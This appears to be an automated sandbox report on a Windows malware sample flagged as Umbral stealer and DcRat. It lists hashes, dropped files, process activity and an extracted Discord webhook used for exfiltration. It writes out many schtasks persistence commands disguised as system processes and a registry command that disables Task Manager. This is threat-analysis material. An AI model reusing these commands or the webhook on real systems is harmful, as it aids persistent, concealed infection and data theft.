Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-05-2024 19:11
Static task
static1
Behavioral task
behavioral1
Sample
898A94F29EDC228CE3BD2054F3D5D6DD.exe
Resource
win7-20240221-en
General
-
Target
898A94F29EDC228CE3BD2054F3D5D6DD.exe
-
Size
4.3MB
-
MD5
898a94f29edc228ce3bd2054f3d5d6dd
-
SHA1
f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5
-
SHA256
a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37
-
SHA512
8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae
-
SSDEEP
49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1229451067175997500/jIKKpDize9BATyGRwJszp_dngrLcH2ykCNVKA2g8DaU3tS2rFJtimCYVQM10Zmvy_yF-
Signatures
-
DcRat 55 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 3028 schtasks.exe 1656 schtasks.exe 2608 schtasks.exe 2824 schtasks.exe 1160 schtasks.exe 2364 schtasks.exe 1748 schtasks.exe 2560 schtasks.exe 2740 schtasks.exe 2356 schtasks.exe 1488 schtasks.exe 2244 schtasks.exe 2088 schtasks.exe 2296 schtasks.exe Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 898A94F29EDC228CE3BD2054F3D5D6DD.exe 2040 schtasks.exe 2336 schtasks.exe 1732 schtasks.exe 2272 schtasks.exe 336 schtasks.exe 964 schtasks.exe 1068 schtasks.exe 1152 schtasks.exe 2948 schtasks.exe 1444 schtasks.exe 1816 schtasks.exe 1476 schtasks.exe 2580 schtasks.exe 1956 schtasks.exe 2976 schtasks.exe 2084 schtasks.exe 2204 schtasks.exe 536 schtasks.exe 2260 schtasks.exe 2992 schtasks.exe 704 schtasks.exe 1984 schtasks.exe 1436 schtasks.exe 2696 schtasks.exe 1252 schtasks.exe 1008 schtasks.exe 320 schtasks.exe 2428 schtasks.exe 2156 schtasks.exe 2972 schtasks.exe 1700 schtasks.exe 2276 schtasks.exe 2888 schtasks.exe 2784 schtasks.exe 2432 schtasks.exe 1876 schtasks.exe 912 schtasks.exe 1604 schtasks.exe 2160 schtasks.exe 2020 schtasks.exe -
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/memory/2236-0-0x0000000000400000-0x000000000084E000-memory.dmp family_umbral behavioral1/files/0x000d000000012324-3.dat family_umbral behavioral1/memory/2492-21-0x0000000000180000-0x00000000001C0000-memory.dmp family_umbral -
Process spawned unexpected child process 54 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1444 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2276 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2992 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1160 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2204 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2040 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2336 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1876 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2364 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1984 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 536 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 336 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2888 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1436 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1816 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1748 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2356 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2160 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2020 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1152 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3028 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1488 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 964 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1008 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 320 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 912 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1068 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 704 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2260 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2244 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2088 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2784 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1476 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1956 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2976 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2156 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1656 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2608 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2580 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2972 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2948 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2084 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2696 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2428 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2432 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1732 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2296 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2560 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1252 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1700 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2740 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2824 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2272 2688 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1604 2688 schtasks.exe 37 -
resource yara_rule behavioral1/memory/2236-0-0x0000000000400000-0x000000000084E000-memory.dmp dcrat behavioral1/files/0x0035000000013413-9.dat dcrat behavioral1/files/0x0008000000013a6e-32.dat dcrat behavioral1/memory/2692-36-0x0000000000D90000-0x0000000000FDA000-memory.dmp dcrat behavioral1/memory/1976-93-0x0000000001300000-0x000000000154A000-memory.dmp dcrat -
Disables Task Manager via registry modification
-
Executes dropped EXE 5 IoCs
pid Process 2492 stealer.exe 2592 чекер dc.exe 2516 Inject.exe 2692 driverBrokercommon.exe 1976 cmd.exe -
Loads dropped DLL 6 IoCs
pid Process 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 2668 Process not Found 2388 cmd.exe 2388 cmd.exe -
Drops file in Program Files directory 8 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft Synchronization Services\088424020bedd6 driverBrokercommon.exe File created C:\Program Files\DVD Maker\ja-JP\Inject.exe driverBrokercommon.exe File created C:\Program Files\DVD Maker\ja-JP\652d253fe21f9b driverBrokercommon.exe File created C:\Program Files\Common Files\csrss.exe driverBrokercommon.exe File created C:\Program Files\Common Files\886983d96e3d3e driverBrokercommon.exe File created C:\Program Files\Uninstall Information\csrss.exe driverBrokercommon.exe File created C:\Program Files\Uninstall Information\886983d96e3d3e driverBrokercommon.exe File created C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe driverBrokercommon.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\en-US\24dbde2999530e driverBrokercommon.exe File created C:\Windows\schemas\driverBrokercommon.exe driverBrokercommon.exe File created C:\Windows\schemas\1cdec3972599ff driverBrokercommon.exe File created C:\Windows\AppPatch\es-ES\explorer.exe driverBrokercommon.exe File created C:\Windows\AppPatch\es-ES\7a0fd90576e088 driverBrokercommon.exe File created C:\Windows\en-US\WmiPrvSE.exe driverBrokercommon.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 54 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2084 schtasks.exe 2696 schtasks.exe 2260 schtasks.exe 2272 schtasks.exe 2428 schtasks.exe 2296 schtasks.exe 2560 schtasks.exe 1984 schtasks.exe 2156 schtasks.exe 2948 schtasks.exe 1956 schtasks.exe 2276 schtasks.exe 2204 schtasks.exe 2160 schtasks.exe 1476 schtasks.exe 2364 schtasks.exe 2020 schtasks.exe 2088 schtasks.exe 1444 schtasks.exe 2608 schtasks.exe 1488 schtasks.exe 704 schtasks.exe 1656 schtasks.exe 2740 schtasks.exe 1604 schtasks.exe 912 schtasks.exe 1068 schtasks.exe 2976 schtasks.exe 2356 schtasks.exe 1732 schtasks.exe 1252 schtasks.exe 1160 schtasks.exe 2888 schtasks.exe 1816 schtasks.exe 1748 schtasks.exe 2336 schtasks.exe 1436 schtasks.exe 2972 schtasks.exe 536 schtasks.exe 3028 schtasks.exe 2784 schtasks.exe 320 schtasks.exe 2992 schtasks.exe 336 schtasks.exe 1008 schtasks.exe 1876 schtasks.exe 1152 schtasks.exe 2244 schtasks.exe 1700 schtasks.exe 2432 schtasks.exe 2824 schtasks.exe 2040 schtasks.exe 964 schtasks.exe 2580 schtasks.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2832 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 2692 driverBrokercommon.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe 1976 cmd.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1976 cmd.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 2492 stealer.exe Token: SeIncreaseQuotaPrivilege 1468 wmic.exe Token: SeSecurityPrivilege 1468 wmic.exe Token: SeTakeOwnershipPrivilege 1468 wmic.exe Token: SeLoadDriverPrivilege 1468 wmic.exe Token: SeSystemProfilePrivilege 1468 wmic.exe Token: SeSystemtimePrivilege 1468 wmic.exe Token: SeProfSingleProcessPrivilege 1468 wmic.exe Token: SeIncBasePriorityPrivilege 1468 wmic.exe Token: SeCreatePagefilePrivilege 1468 wmic.exe Token: SeBackupPrivilege 1468 wmic.exe Token: SeRestorePrivilege 1468 wmic.exe Token: SeShutdownPrivilege 1468 wmic.exe Token: SeDebugPrivilege 1468 wmic.exe Token: SeSystemEnvironmentPrivilege 1468 wmic.exe Token: SeRemoteShutdownPrivilege 1468 wmic.exe Token: SeUndockPrivilege 1468 wmic.exe Token: SeManageVolumePrivilege 1468 wmic.exe Token: 33 1468 wmic.exe Token: 34 1468 wmic.exe Token: 35 1468 wmic.exe Token: SeIncreaseQuotaPrivilege 1468 wmic.exe Token: SeSecurityPrivilege 1468 wmic.exe Token: SeTakeOwnershipPrivilege 1468 wmic.exe Token: SeLoadDriverPrivilege 1468 wmic.exe Token: SeSystemProfilePrivilege 1468 wmic.exe Token: SeSystemtimePrivilege 1468 wmic.exe Token: SeProfSingleProcessPrivilege 1468 wmic.exe Token: SeIncBasePriorityPrivilege 1468 wmic.exe Token: SeCreatePagefilePrivilege 1468 wmic.exe Token: SeBackupPrivilege 1468 wmic.exe Token: SeRestorePrivilege 1468 wmic.exe Token: SeShutdownPrivilege 1468 wmic.exe Token: SeDebugPrivilege 1468 wmic.exe Token: SeSystemEnvironmentPrivilege 1468 wmic.exe Token: SeRemoteShutdownPrivilege 1468 wmic.exe Token: SeUndockPrivilege 1468 wmic.exe Token: SeManageVolumePrivilege 1468 wmic.exe Token: 33 1468 wmic.exe Token: 34 1468 wmic.exe Token: 35 1468 wmic.exe Token: SeDebugPrivilege 2692 driverBrokercommon.exe Token: SeDebugPrivilege 1976 cmd.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 2236 wrote to memory of 2492 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 28 PID 2236 wrote to memory of 2492 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 28 PID 2236 wrote to memory of 2492 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 28 PID 2236 wrote to memory of 2492 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 28 PID 2236 wrote to memory of 2592 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 29 PID 2236 wrote to memory of 2592 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 29 PID 2236 wrote to memory of 2592 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 29 PID 2236 wrote to memory of 2592 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 29 PID 2236 wrote to memory of 2516 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 30 PID 2236 wrote to memory of 2516 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 30 PID 2236 wrote to memory of 2516 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 30 PID 2236 wrote to memory of 2516 2236 898A94F29EDC228CE3BD2054F3D5D6DD.exe 30 PID 2592 wrote to memory of 2648 2592 чекер dc.exe 32 PID 2592 wrote to memory of 2648 2592 чекер dc.exe 32 PID 2592 wrote to memory of 2648 2592 чекер dc.exe 32 PID 2592 wrote to memory of 2648 2592 чекер dc.exe 32 PID 2492 wrote to memory of 1468 2492 stealer.exe 33 PID 2492 wrote to memory of 1468 2492 stealer.exe 33 PID 2492 wrote to memory of 1468 2492 stealer.exe 33 PID 2648 wrote to memory of 2388 2648 WScript.exe 35 PID 2648 wrote to memory of 2388 2648 WScript.exe 35 PID 2648 wrote to memory of 2388 2648 WScript.exe 35 PID 2648 wrote to memory of 2388 2648 WScript.exe 35 PID 2388 wrote to memory of 2692 2388 cmd.exe 38 PID 2388 wrote to memory of 2692 2388 cmd.exe 38 PID 2388 wrote to memory of 2692 2388 cmd.exe 38 PID 2388 wrote to memory of 2692 2388 cmd.exe 38 PID 2692 wrote to memory of 2312 2692 driverBrokercommon.exe 93 PID 2692 wrote to memory of 2312 2692 driverBrokercommon.exe 93 PID 2692 wrote to memory of 2312 2692 driverBrokercommon.exe 93 PID 2312 wrote to memory of 1248 2312 cmd.exe 95 PID 2312 wrote to memory of 1248 2312 cmd.exe 95 PID 2312 wrote to memory of 1248 2312 cmd.exe 95 PID 2388 wrote to memory of 2832 2388 cmd.exe 96 PID 2388 wrote to memory of 2832 2388 cmd.exe 96 PID 2388 wrote to memory of 2832 2388 cmd.exe 96 PID 2388 wrote to memory of 2832 2388 cmd.exe 96 PID 2312 wrote to memory of 1976 2312 cmd.exe 97 PID 2312 wrote to memory of 1976 2312 cmd.exe 97 PID 2312 wrote to memory of 1976 2312 cmd.exe 97 PID 1976 wrote to memory of 2280 1976 cmd.exe 98 PID 1976 wrote to memory of 2280 1976 cmd.exe 98 PID 1976 wrote to memory of 2280 1976 cmd.exe 98 PID 1976 wrote to memory of 3068 1976 cmd.exe 99 PID 1976 wrote to memory of 3068 1976 cmd.exe 99 PID 1976 wrote to memory of 3068 1976 cmd.exe 99 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"1⤵
- DcRat
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\stealer.exe"C:\Users\Admin\AppData\Local\Temp\stealer.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
-
C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"3⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\MsWinsessiondllNet\driverBrokercommon.exe"C:\MsWinsessiondllNet\driverBrokercommon.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eSeckPEt0m.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:1248
-
-
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe"C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f3ee51fa-6ca5-405c-bf99-9cf2f55fcb50.vbs"8⤵PID:2280
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9a182fe7-568d-414b-951d-25d6244808b7.vbs"8⤵PID:3068
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵
- Modifies registry key
PID:2832
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Inject.exe"C:\Users\Admin\AppData\Local\Temp\Inject.exe"2⤵
- Executes dropped EXE
PID:2516
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Users\Public\taskhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1444
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1152
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\MsWinsessiondllNet\lsm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1488
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\lsm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\lsm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1068
-
